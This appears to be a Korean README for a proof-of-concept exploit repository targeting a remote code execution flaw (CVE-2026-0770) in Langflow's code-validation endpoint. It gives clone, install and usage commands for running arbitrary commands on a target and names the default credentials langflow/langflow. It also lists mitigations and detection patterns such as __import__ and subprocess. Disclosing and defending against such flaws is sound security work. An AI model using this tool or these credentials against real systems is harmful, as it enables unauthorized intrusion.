
Langflow 원격 코드 실행(RCE) 개념 증명
Langflow의 원격 코드 실행 취약점
이 취약점은 다음에 영향을 미칩니다:
Langflow
CVE-2026-0770은 다음 엔드포인트의 원격 코드 실행(RCE) 취약점입니다:
/api/v1/validate/code
AUTO_LOGIN=true 및 기본 자격 증명이 활성화된 경우, 공격자는 다음을 수행할 수 있습니다:
이 문제는 검증 중 안전하지 않은 Python 코드 평가에서 비롯됩니다.
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
Python 3.8+가 설치되어 있는지 확인하세요.
의존성 설치:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
대화형 원격 명령 실행 시작:
python3 CVE-2026-0770.py -t http://target:7860
예시:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
예시:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
상세 디버깅 출력을 표시합니다.
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
토큰이 제공되지 않으면 스크립트는 다음을 사용하여 자동 로그인을 시도합니다:
username: langflow
password: langflow
성공하면 access_token을 검색하고 계속 진행합니다.
관리자는 다음을 수행해야 합니다:
AUTO_LOGIN 비활성화/api/v1/validate/code 접근 제한다음을 모니터링하세요:
/api/v1/validate/code에 대한 의심스러운 POST 요청
다음을 포함하는 코드:
__import__subprocessthrow(Exception(기본 자격 증명을 사용한 반복적인 로그인 시도
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
보안 연구원 | 익스플로잇 개발자 | PoC 작성자
MIT 라이선스에 따라 배포됩니다. 전체 라이선스는 여기에서 확인하세요:
이 프로젝트는 다음을 위한 것입니다:
소유하지 않았거나 테스트에 대한 명시적 권한이 없는 시스템에 대한 무단 사용은 불법입니다.